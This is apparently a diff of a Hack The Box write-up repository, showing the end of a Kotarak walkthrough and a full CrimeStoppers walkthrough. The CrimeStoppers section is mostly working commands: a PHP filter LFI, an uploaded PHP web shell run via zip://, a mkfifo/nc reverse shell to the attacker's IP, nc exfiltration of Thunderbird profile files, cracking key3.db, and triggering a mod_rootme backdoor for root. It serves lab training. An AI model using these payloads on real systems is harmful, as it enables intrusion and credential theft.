drwxr-xr-x 4 root root 4096 Jul 21 2017 dev
drwxr-xr-x 105 root root 4096 Jan 18 2018 etc
drwxr-xr-x 4 root root 4096 Jul 21 2017 home
drwxr-xr-x 24 root root 4096 Jul 21 2017 lib
drwxr-xr-x 2 root root 4096 Jul 21 2017 lib32
drwxr-xr-x 2 root root 4096 Jul 21 2017 lib64
drwxr-xr-x 2 root root 4096 Jul 21 2017 libx32
drwx------ 2 root root 16384 Jul 9 2017 lost+found
drwxr-xr-x 4 root root 4096 Jul 21 2017 media
drwxr-xr-x 2 root root 4096 Jul 19 2016 mnt
drwxr-xr-x 4 root root 4096 Jul 21 2017 opt
drwxr-xr-x 2 root root 4096 Jul 21 2017 proc
drwxrwxrwx 6 root root 4096 Sep 19 2017 root
drwxr-xr-x 2 root root 4096 Jul 9 2017 run
drwxr-xr-x 2 root root 12288 Jul 21 2017 sbin
drwxr-xr-x 2 root root 4096 Jul 21 2017 snap
drwxr-xr-x 2 root root 4096 Jul 21 2017 srv
drwxr-xr-x 2 root root 4096 Jul 21 2017 sys
drwxrwxrwt 10 root root 4096 Dec 22 16:39 tmp
drwxr-xr-x 13 root root 4096 Jul 21 2017 usr
drwxr-xr-x 15 root root 4096 Jul 21 2017 var
lrwxrwxrwx 1 root root 29 Aug 29 2017 vmlinuz -> boot/vmlinuz-4.4.0-87-generic
lrwxrwxrwx 1 root root 29 Jul 10 2017 vmlinuz.old -> boot/vmlinuz-4.4.0-83-generic
And from here just go to the root directory and print out the root flag:
[ 10.10.14.6/23 ] [ /dev/pts/20 ] [/mnt/kotarak]
→ sudo -i
[ 10.10.14.6/23 ] [ /dev/pts/20 ] [~]
→ cd /mnt/kotarak/var/lib/lxc/kotarak-int/rootfs/root
[ 10.10.14.6/23 ] [ /dev/pts/20 ] [kotarak-int/rootfs/root]
→ cat root.txt
95XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Kotarak]
→ sudo umount /mnt/kotarak
And there you have it!
## **Conclusion**
Here we can see the progress graph :
![](img/6_graph.png)

611
Hard/8.md Normal file
View file

@ -0,0 +1,611 @@
# CrimeStoppers Writeup
![](img/8.png)
## Introduction :
CrimeStoppers is a hard linux box released back in January 2018.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.80 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Discovered open port 80/tcp on 10.10.10.80
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.7/23 ] [ /dev/pts/8 ] [~]
→ sudo nmap -sCV -p80 10.10.10.80
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-03 10:21 GMT
Nmap scan report for 10.10.10.80
Host is up (0.033s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Ubuntu))
|_http-server-header: Apache/2.4.25 (Ubuntu)
|_http-title: FBIs Most Wanted: FSociety
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds
## **Part 2 : Getting User Access**
Our nmap scan picked up port 80 so let's investigate it:
![](prg/8/1.png)
we navigate to the upload page:
![](prg/8/2.png)
And here the fun starts. Let's see if this op parameter contains a LFI:
![](prg/8/3.png)
So it seems the developer tries to protect against LFI attacks, so let's see if we can poke around that some more using well-known php vulnerability with base64 encryption:
[ 10.10.14.7/23 ] [ /dev/pts/8 ] [~]
→ curl http://10.10.10.80/\?op\=php://filter/convert.base64-encode/resource\=view 2>/dev/null | tail -n21 | head -n1
PD9waHAKaW5jbHVkZSAnY29tbW9uLnBocCc7CgppZihlbXB0eSgkX0dFVFsnc2VjcmV0bmFtZSddKSkgewogICAgaGVhZGVyKCdMb2NhdGlvbjogP29wPWhvbWUnKTsKICAgIGV4aXQoKTsKfQoKJHNlY3JldG5hbWUgPSAkX0dFVFsnc2VjcmV0bmFtZSddOwppZiAoJHNlY3JldG5hbWUgPT0gIndoaXRlcm9zZS50eHQiKSB7CgkkdGlwID0gZmlsZV9nZXRfY29udGVudHMoJ3VwbG9hZHMvJyAuIGJhc2VuYW1lKCRzZWNyZXRuYW1lKSk7Cn0gZWxzZSB7CgkkdGlwID0gZmlsZV9nZXRfY29udGVudHMoJ3VwbG9hZHMvJyAuICRfU0VSVkVSWydSRU1PVEVfQUREUiddIC4gJy8nIC4gYmFzZW5hbWUoJHNlY3JldG5hbWUpKTsKfQoKPz4KCjw/cGhwCmVjaG8gIllvdXIgVGlwOjxiciAvPiI7CmVjaG8gaHRtbGVudGl0aWVzKCR0aXApOwo/Pgo8L3NjcmlwdD4K <****/footer>
Then simply pipe it through base64 -d and you get the following results:
![](prg/8/4.png)
Not much in the view php page above, however on the upload php file we see something interesting:
![](prg/8/5.png)
if(isset($_POST['submit']) && isset($_POST['tip'])) {
// CSRF Token to help ensure this user came from our submission form.
if 1 == 1 { //(!empty($_POST['token'])) {
if (hash_equals($token, $_POST['token'])) {
$_SESSION['token'] = bin2hex(openssl_random_pseudo_bytes(32));
// Place tips in the folder of the client IP Address.
if (!is_dir('uploads/' . $client_ip)) {
mkdir('uploads/' . $client_ip, 0755, false);
}
$tip = $_POST['tip'];
$secretname = genFilename();
file_put_contents("uploads/". $client_ip . '/' . $secretname, $tip);
header("Location: ?op=view&secretname;=$secretname");
} else {
print 'Hacker Detected.';
print $token;
die();
}
}
Here we see that the uploaded files are uploaded into **/uploads/ip/** , so we should be able to upload arbitrary data into a file. Moving into the index php page we see something interesting:
![](prg/8/6.png)
There is a disabled parameter here named 'list' so let's browse to it and see what we get:
![](prg/8/7.png)
Which reveals us a textfile:
![](prg/8/8.png)
Which reveals us the parameter "secretname" which most likely designates the filename itself as seen above
[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/CrimeStoppers]
→ vim cmd.php
[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/CrimeStoppers]
→ cat cmd.php
<****?php echo system($_GET['cmd']); ?****>
[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/CrimeStoppers]
→ zip shell.zip cmd.php
adding: cmd.php (stored 0%)
Now we can use curl to upload to the site. We need the session cookie and the CSRF token, and then we need to follow the redirection (302) location afterward, for debugging purposes we pass it through burpsuite proxy with the **-x 127.0.0.1:8080** as follows:
[ 10.10.14.8/23 ] [ /dev/pts/0 ] [~/HTB/Crimestoppers]
→ curl -sD - http://10.10.10.80/\?op\=upload -x 127.0.0.1:8080 | grep -e PHPSESSID -e 'name="token"'
Set-Cookie: PHPSESSID=kgr3kb7nskn6e2gh6spmtfjfk5; path=/
<****input type="text" id="token" name="token" style="display: none" value="16df27a6347c2285cc0dbf5c1525d0f0be26c44cdde404a2fd2c0e90a592ffd6" style="width:355px;" />
Next we use the CSRF token and the session cookie to send the zip file containing our cmd.php payload (btw do it inside bash because there's something zsh doesn't like in it:):
[ 10.10.14.8/23 ] [ /dev/pts/0 ] [~/HTB/Crimestoppers]
→ bash
┌──(nothing㉿nowhere)-[~/HTB/Crimestoppers]
└─$ curl -X POST -sD - -F "tip=<****shell.zip" -F "name=a" -F "token=16df27a6347c2285cc0dbf5c1525d0f0be26c44cdde404a2fd2c0e90a592ffd6" -F "submit=Send Tip!" -x 127.0.0.1:8080 http://10.10.10.80/\?op\=upload -H "Referer: http://10.10.10.80/?op=upload" -H "Cookie: admin=1; PHPSESSID=kgr3kb7nskn6e2gh6spmtfjfk5"
` ![](prg/8/28.png)
We forward the request and we get the location of our file:
┌──(nothing㉿nowhere)-[~/HTB/Crimestoppers]
└─$ curl -sD - http://10.10.10.80/?op=upload -x 127.0.0.1:8080 | grep -e PHPSESSID -e 'name="token"'
Set-Cookie: PHPSESSID=cqoq8gg8fqd3cqfl7mflbqfff5; path=/
<****input type="text" id="token" name="token" style="display: none" value="74076b162a114837f912f9476baa778842aa1d1385702c88921495bd9d2ccd36" style="width:355px;" />
┌──(nothing㉿nowhere)-[~/HTB/Crimestoppers]
└─$ curl -X POST -sD - -F "tip= <****shell.zip" -F "name=a" -F "token=74076b162a114837f912f9476baa778842aa1d1385702c88921495bd9d2ccd36" -F "submit=Send Tip!" -x 127.0.0.1:8080 http://10.10.10.80/\?op\=upload -H "Referer: http://10.10.10.80/?op=upload" -H "Cookie: admin=1; PHPSESSID=cqoq8gg8fqd3cqfl7mflbqfff5" | grep Location
Location: ?op=view &secretname;=db0cf33401569e78efe46ec7df40e66a4d1f3252
now that we have the location **?op=view &secretname;=db0cf33401569e78efe46ec7df40e66a4d1f3252** we can get command execution with the **zip://** filter at **http://10.10.10.80/?op=zip://uploads/10.10.14.8/db0cf33401569e78efe46ec7df40e66a4d1f3252%23cmd &cmd;=id**:
![](prg/8/29.png)
And we have code execution as www-data! Now let's send it over to burpsuite's repeater:
![](prg/8/30.png)
Now let's see if we can get to the user flag:
![](prg/8/31.png) ![](prg/8/32.png)
And we got the user flag from dom's directory!
## **Part 3 : Getting Root Access**
Before we proceed to privesc let's get a reverse bash shell:
[ 10.10.14.8/23 ] [ /dev/pts/7 ] [~/HTB/Crimestoppers]
→ nc -lvnp 9001
listening on [any] 9001 ...
#RAW PAYLOAD
GET /?op=zip://uploads/10.10.14.8/db0cf33401569e78efe46ec7df40e66a4d1f3252%23cmd&cmd;=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 9001 >/tmp/f HTTP/1.1
#URL ENCODED (SELECT AND CTRL+U)
http://10.10.10.80/?op=zip://uploads/10.10.14.8/db0cf33401569e78efe46ec7df40e66a4d1f3252%23cmd&cmd;=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.11+9001+>/tmp/f
` ![](prg/8/33.png)
[ 10.10.14.8/23 ] [ /dev/pts/7 ] [~/HTB/Crimestoppers]
→ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.80] 40832
/bin/sh: 0: can't access tty; job control turned off
$
And we get a reverse shell! Now as usual we spawn a fully interactive TTY:
/bin/sh: 0: can't access tty; job control turned off
$ which python python3 wget curl bash sh
/usr/bin/python3
/usr/bin/wget
/bin/bash
/bin/sh
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html$ ^Z
[1] + 429408 suspended nc -lvnp 9001
[ 10.10.14.8/23 ] [ /dev/pts/7 ] [~/HTB/Crimestoppers]
→ stty raw -echo ; fg
[1] + 429408 continued nc -lvnp 9001
export TERM=screen-256color
www-data@ubuntu:/var/www/html$ export SHELL=bash
www-data@ubuntu:/var/www/html$ stty rows 50 columns 200
www-data@ubuntu:/var/www/html$ reset
Now that's done we navigate to dom's home directory to find the .thunderbird hint:
www-data@ubuntu:/var/www/html$ cd /home/dom
www-data@ubuntu:/home/dom$ ls -lash
total 44K
4.0K drwxr-xr-x 5 dom dom 4.0K Dec 25 2017 .
4.0K drwxr-xr-x 3 root root 4.0K Dec 16 2017 ..
4.0K -rw------- 1 dom dom 52 Dec 16 2017 .Xauthority
4.0K -rw------- 1 dom dom 5 Dec 22 2017 .bash_history
4.0K -rw-r--r-- 1 dom dom 220 Dec 16 2017 .bash_logout
4.0K -rw-r--r-- 1 dom dom 3.7K Dec 16 2017 .bashrc
4.0K drwx------ 2 dom dom 4.0K Dec 16 2017 .cache
4.0K -rw-r--r-- 1 dom dom 675 Dec 16 2017 .profile
4.0K drwx------ 2 dom dom 4.0K Dec 25 2017 .ssh
0 -rw-r--r-- 1 dom dom 0 Dec 16 2017 .sudo_as_admin_successful
4.0K drw-r-xr-x 3 root root 4.0K Dec 16 2017 .thunderbird
4.0K -r--r--r-- 1 root root 33 Jul 9 09:07 user.txt
www-data@ubuntu:/home/dom$ which nc
/bin/nc
Let's zip it and download it to our box since netcat is already on the box:
[terminal 1]
www-data@ubuntu:/home/dom$ zip -r /tmp/thunder.zip .thunderbird/
www-data@ubuntu:/home/dom$ cd /tmp
www-data@ubuntu:/tmp$
www-data@ubuntu:/tmp$ ls -l
total 408
prw-r--r-- 1 www-data www-data 0 Jul 9 10:00 f
-rw-r--r-- 1 www-data www-data 414930 Jul 9 09:59 thunder.zip
www-data@ubuntu:/tmp$ md5sum thunder.zip
57666b729532e628aac22b2e7d84b21d thunder.zip
www-data@ubuntu:/tmp$ cat thunder.zip | nc 10.10.14.8 9999
[terminal 2]
[ 10.10.14.8/23 ] [ /dev/pts/31 ] [~/HTB/Crimestoppers]
→ nc -lvnp 9999 > thunder.zip
listening on [any] 9999 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.80] 49806
^C
[ 10.10.14.8/23 ] [ /dev/pts/31 ] [~/HTB/Crimestoppers]
→ md5sum thunder.zip
57666b729532e628aac22b2e7d84b21d thunder.zip
Both hashes match, therefore the file transfer was successful.
[ 10.10.14.8/23 ] [ /dev/pts/31 ] [~/HTB/Crimestoppers]
→ unzip thunder.zip
Archive: thunder.zip
creating: .thunderbird/
creating: .thunderbird/36jinndk.default/
inflating: .thunderbird/36jinndk.default/webappsstore.sqlite
inflating: .thunderbird/36jinndk.default/extensions.ini
extracting: .thunderbird/36jinndk.default/times.json
inflating: .thunderbird/36jinndk.default/blist.sqlite
extracting: .thunderbird/36jinndk.default/.parentlock
inflating: .thunderbird/36jinndk.default/xulstore.json
inflating: .thunderbird/36jinndk.default/formhistory.sqlite
inflating: .thunderbird/36jinndk.default/**key3.db**
As we unzip it, we run **mozilla2john** on the **key3.db** file to then crack it using **john** and rockyou.txt:
[ 10.10.14.8/23 ] [ /dev/pts/31 ] [~/HTB/Crimestoppers]
→ sudo /usr/share/john/mozilla2john.py .thunderbird/36jinndk.default/key3.db
key3.db:$mozilla$*3*20*1*811d3b70d608a8ad6faee44bf0568bd77ca8b2ca*11*0000000000000000000000*16*1810e3dcb634e700a4d959e35d38f282*20*11a9519177437ef38aa8bf1966d02f0d9f6a8c2f
[ 10.10.14.8/23 ] [ /dev/pts/31 ] [~/HTB/Crimestoppers]
→ sudo /usr/share/john/mozilla2john.py .thunderbird/36jinndk.default/key3.db > key3.db.john
[ 10.10.14.8/23 ] [ /dev/pts/31 ] [~/HTB/Crimestoppers]
→ john -w=/usr/share/wordlists/rockyou.txt key3.db.john --fork=4
Using default input encoding: UTF-8
Loaded 1 password hash (Mozilla, Mozilla key3.db [SHA1 3DES 32/64])
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
(key3.db)
4 1g 0:00:00:00 DONE (2021-07-09 19:30) 33.33g/s 42666p/s 42666c/s 42666C/s smitty..babygrl
2 0g 0:00:00:15 DONE (2021-07-09 19:30) 0g/s 237479p/s 237479c/s 237479C/s tania.abygurl69
1 0g 0:00:00:15 DONE (2021-07-09 19:30) 0g/s 234069p/s 234069c/s 234069C/s Jakekovac3.ie168
Waiting for 3 children to terminate
3 0g 0:00:00:15 DONE (2021-07-09 19:30) 0g/s 230903p/s 230903c/s 230903C/s 0125457423 .a6_123
Session completed
Looks like we have an empty password for our key3.db file so let's install thunderbird to check if this is really an empty password:
[ 10.10.14.8/23 ] [ /dev/pts/32 ] [~/HTB/Crimestoppers]
→ sudo apt install thunderbird -y
[ 10.10.14.8/23 ] [ /dev/pts/34 ] [~]
→ cd ~/.thunderbird
[ 10.10.14.8/23 ] [ /dev/pts/34 ] [~/.thunderbird]
→ ls
110d40o6.default 13u77s1u.default-default 'Crash Reports' installs.ini 'Pending Pings' profiles.ini
[ 10.10.14.8/23 ] [ /dev/pts/34 ] [~/.thunderbird]
→ sudo cp -r ~/HTB/Crimestoppers/.thunderbird/36jinndk.default .
[sudo] password for nothing:
[ 10.10.14.8/23 ] [ /dev/pts/34 ] [~/.thunderbird]
→ vim profiles.ini
[ 10.10.14.8/23 ] [ /dev/pts/34 ] [~/.thunderbird]
→ cat profiles.ini
[Profile1]
Name=default
IsRelative=1
Path=36jinndk.default
Default=1
[InstallFDC34C9F024745EB]
Default=13u77s1u.default-default
Locked=1
[Profile0]
Name=default-default
IsRelative=1
Path=13u77s1u.default-default
[General]
StartWithLastProfile=1
Version=2
[ 10.10.14.8/23 ] [ /dev/pts/34 ] [~/.thunderbird]
→ thunderbird -ProfileManager
And after taking a look at dom's emails, we can go into the 'saved passwords' security setting to find her password **Gummer59** so let's get a shell as dom:
www-data@ubuntu:/var/www/html$ su - dom
Password: Gummer59
dom@ubuntu:~$ id
uid=1000(dom) gid=1000(dom) groups=1000(dom),**4(adm)** ,24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)
One interesting thing to note here is that we are part of the **adm** group so we may be able to take a look at the machine's logs. Now that's done let's take a look at her draft emails:
dom@ubuntu:~$ cd .thunderbird/36jinndk.default/ImapMail/crimestoppers.htb/
dom@ubuntu:~/.thunderbird/36jinndk.default/ImapMail/crimestoppers.htb$ cat Drafts-1
From
FCC: imap://dom%40crimestoppers.htb@crimestoppers.htb/Sent
X-Identity-Key: id1
X-Account-Key: account1
To: elliot@ecorp.htb
From: dom
Subject: Potential Rootkit
Message-ID: <1f42c857-08fd-1957-8a2d-fa9a4697ffa5@crimestoppers.htb>
Date: Sat, 16 Dec 2017 12:53:18 -0800
X-Mozilla-Draft-Info: internal/draft; vcard=0; receipt=0; DSN=0; uuencode=0;
attachmentreminder=0; deliveryformat=4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Thunderbird/52.5.0
MIME-Version: 1.0
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Transfer-Encoding: 8bit
Elliot.
We got a suspicious email from the DarkArmy claiming there is a
Remote Code Execution bug on our Webserver.  I don't trust them
and ran rkhunter, it reported that there a rootkit installed
called: apache_modrootme backdoor.
According to my research, if this rootkit was on the server I
should be able to run "nc localhost 80" and then type get root to
get
nc localhost 80
get root
From - Sat Dec 16 12:53:19 2017
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
FCC: imap://dom%40crimestoppers.htb@crimestoppers.htb/Sent
X-Identity-Key: id1
X-Account-Key: account1
To: elliot@ecorp.htb
From: dom
Subject: Potential Rootkit
Message-ID: <1f42c857-08fd-1957-8a2d-fa9a4697ffa5@crimestoppers.htb>
Date: Sat, 16 Dec 2017 12:53:18 -0800
X-Mozilla-Draft-Info: internal/draft; vcard=0; receipt=0; DSN=0; uuencode=0;
attachmentreminder=0; deliveryformat=4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Thunderbird/52.5.0
MIME-Version: 1.0
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Transfer-Encoding: 8bit
Elliot.
We got a suspicious email from the DarkArmy claiming there is a
Remote Code Execution bug on our Webserver.  I don't trust them
and ran rkhunter, it reported that there a rootkit installed
called: apache_modrootme backdoor.
According to my research, if this rootkit was on the server I
should be able to run "nc localhost 80" and then type get root to
get
nc localhost 80
get root
Now we have a hint towards a certain rootkit/backdoor called **apache_modrootme** , let's run linpeas.sh on the box if it gets picked up:
[terminal 1]
[ 10.10.14.8/23 ] [ /dev/pts/14 ] [~/HTB/Crimestoppers]
→ cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
[ 10.10.14.8/23 ] [ /dev/pts/14 ] [~/HTB/Crimestoppers]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
10.10.10.80 - - [10/Jul/2021 13:56:57] "GET /linpeas.sh HTTP/1.1" 200 -
[terminal 2]
dom@ubuntu:~$ wget http://10.10.14.8:9090/linpeas.sh -O /tmp/peas.sh
--2021-07-10 05:05:15-- http://10.10.14.8:9090/linpeas.sh
Connecting to 10.10.14.8:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 341863 (334K) [text/x-sh]
Saving to: /tmp/peas.sh
/tmp/peas.sh 100%[=============================================================================================================>] 333.85K 117KB/s in 2.8s
2021-07-10 05:05:19 (117 KB/s) - /tmp/peas.sh saved [341863/341863]
dom@ubuntu:~$ chmod +x /tmp/peas.sh
dom@ubuntu:~$ /tmp/peas.sh
` ![](prg/8/35.png)
Now we don't necessarily get the modrootme apache string we wanted, but we do get the confirmation that of our suspicion earlier, we are able to read logs of apache2, and chances are, that we may get passwords in here. So let's take a look:
![](prg/8/36.png)
dom@ubuntu:/var/log/apache2$ zcat access.log.* | grep -v 'OPTIONS\|HEAD\|POST\|GET' | grep ' 400 '
gzip: access.log.1: not in gzip format
::1 - - [25/Dec/2017:12:59:19 -0800] "FunSociety" 400 0 "-" "-"
::1 - - [25/Dec/2017:13:00:00 -0800] "FunSociety" 400 0 "-" "-"
127.0.0.1 - - [25/Dec/2017:13:11:04 -0800] "FunSociety" 400 0 "-" "-"
10.10.10.80 - - [25/Dec/2017:13:11:22 -0800] "FunSociety" 400 0 "-" "-"
10.10.10.80 - - [25/Dec/2017:13:11:32 -0800] "42PA" 400 0 "-" "-"
10.10.10.80 - - [25/Dec/2017:13:11:46 -0800] "FunSociety" 400 0 "-" "-"
::1 - - [25/Dec/2017:13:13:12 -0800] "FunSociety" 400 0 "-" "-"
::1 - - [25/Dec/2017:13:13:52 -0800] "FunSociety" 400 0 "-" "-"
::1 - - [25/Dec/2017:13:13:55 -0800] "FunSociety" 400 0 "-" "-"
::1 - - [25/Dec/2017:13:14:00 -0800] "FunSociety" 400 0 "-" "-"
10.10.14.3 - - [25/Dec/2017:13:14:53 -0800] "FunSociety" 400 0 "-" "-"
10.10.10.80 - - [22/Dec/2017:10:17:17 -0800] "sdf" 400 0 "-" "-"
10.10.10.80 - - [22/Dec/2017:10:17:34 -0800] "Get FunSociety" 400 301 "-" "-"
::1 - - [23/Dec/2017:14:39:17 -0800] "get root" 400 301 "-" "-"
::1 - - [23/Dec/2017:14:40:53 -0800] "get-root" 400 0 "-" "-"
::1 - - [23/Dec/2017:14:41:02 -0800] "root" 400 0 "-" "-"
::1 - - [23/Dec/2017:14:43:28 -0800] "HackTheBox" 400 0 "-" "-"
::1 - - [23/Dec/2017:14:43:34 -0800] "darkarmy" 400 0 "-" "-"
::1 - - [23/Dec/2017:14:46:50 -0800] "WhiteRose@DarkArmy.htb" 400 0 "-" "-"
::1 - - [23/Dec/2017:14:48:09 -0800] "HackTheBox" 400 0 "-" "-"
::1 - - [23/Dec/2017:14:48:30 -0800] "/var/www/html/uploads/whiterose.txt" 400 0 "-" "-"
::1 - - [23/Dec/2017:14:51:37 -0800] "bash" 400 0 "-" "-"
::1 - - [23/Dec/2017:14:57:40 -0800] "rootme" 400 0 "-" "-"
::1 - - [23/Dec/2017:15:04:41 -0800] "hACKtHEbOX" 400 0 "-" "-"
::1 - - [23/Dec/2017:15:04:52 -0800] "DmogXdiNct" 400 0 "-" "-"
::1 - - [23/Dec/2017:15:05:04 -0800] "ElnfYehObu" 400 0 "-" "-"
::1 - - [23/Dec/2017:15:05:12 -0800] "FomeZfkLav" 400 0 "-" "-"
::1 - - [23/Dec/2017:15:05:21 -0800] "dMOGxDInCT" 400 0 "-" "-"
::1 - - [23/Dec/2017:15:05:33 -0800] "eLNFyEHoBU" 400 0 "-" "-"
::1 - - [23/Dec/2017:15:05:46 -0800] "fOMEzFKlAV" 400 0 "-" "-"
And when we take a look at apache's access logs we see a bunch of requests that have been made with the passphrase **FunSociety** and **get-root** so we put the pieces together by taking a look at the modrootme github repository [here](https://github.com/sajith/mod-rootme): and we see that we need to do the following:
nc localhost 80
get root
id
So let's try it:
[ 10.10.14.8/23 ] [ /dev/pts/15 ] [~/HTB/Crimestoppers]
→ nc 10.10.10.80 80
GET FunSociety
rootme-0.5 DarkArmy Edition Ready
id
uid=0(root) gid=0(root) groups=0(root)
python3 -c 'import pty;pty.spawn("/bin/bash")'
root@ubuntu:/# cd ~
cd ~
root@ubuntu:/root# cat root.txt
cat root.txt
6fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get a root shell and get the root flag.
## **Conclusion**
Here we can see the progress graph :
![](img/8_graph.png)

1144
Hard/9.md Normal file
View file

File diff suppressed because it is too large Load diff

BIN
Hard/img/0.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 57 KiB

BIN
Hard/img/0_graph.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 20 KiB

BIN
Hard/img/1.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 43 KiB

BIN
Hard/img/10.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 52 KiB

BIN
Hard/img/10_graph.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 15 KiB

BIN
Hard/img/11.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 44 KiB

BIN
Hard/img/12.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 55 KiB

BIN
Hard/img/13.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 54 KiB

BIN
Hard/img/14.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 35 KiB

BIN
Hard/img/15.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 55 KiB

BIN
Hard/img/16.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 44 KiB

BIN
Hard/img/17.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 40 KiB

BIN
Hard/img/18.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 38 KiB

BIN
Hard/img/19.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 44 KiB

BIN
Hard/img/2.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 56 KiB

BIN
Hard/img/20.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 44 KiB

BIN
Hard/img/21.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 43 KiB

BIN
Hard/img/22.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 62 KiB

BIN
Hard/img/23.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 59 KiB

BIN
Hard/img/24.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 55 KiB

BIN
Hard/img/25.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 45 KiB

BIN
Hard/img/26.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 45 KiB

BIN
Hard/img/27.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 54 KiB

BIN
Hard/img/28.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 67 KiB

BIN
Hard/img/29.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 50 KiB

BIN
Hard/img/2_graph.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 21 KiB

BIN
Hard/img/3.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 47 KiB

BIN
Hard/img/30.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 47 KiB

BIN
Hard/img/31.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 48 KiB

BIN
Hard/img/32.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 54 KiB

BIN
Hard/img/33.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 56 KiB

BIN
Hard/img/34.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 53 KiB

BIN
Hard/img/35.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 59 KiB

BIN
Hard/img/36.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 54 KiB

BIN
Hard/img/37.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 67 KiB

BIN
Hard/img/38.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 51 KiB

BIN
Hard/img/39.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 78 KiB

BIN
Hard/img/3_graph.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 22 KiB

BIN
Hard/img/4.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 38 KiB

BIN
Hard/img/4_graph.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 20 KiB

BIN
Hard/img/5.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 46 KiB

BIN
Hard/img/5_graph.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 17 KiB

BIN
Hard/img/6.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 44 KiB

BIN
Hard/img/6_graph.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 26 KiB

BIN
Hard/img/7.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 54 KiB

BIN
Hard/img/7_graph.png Normal file
View file

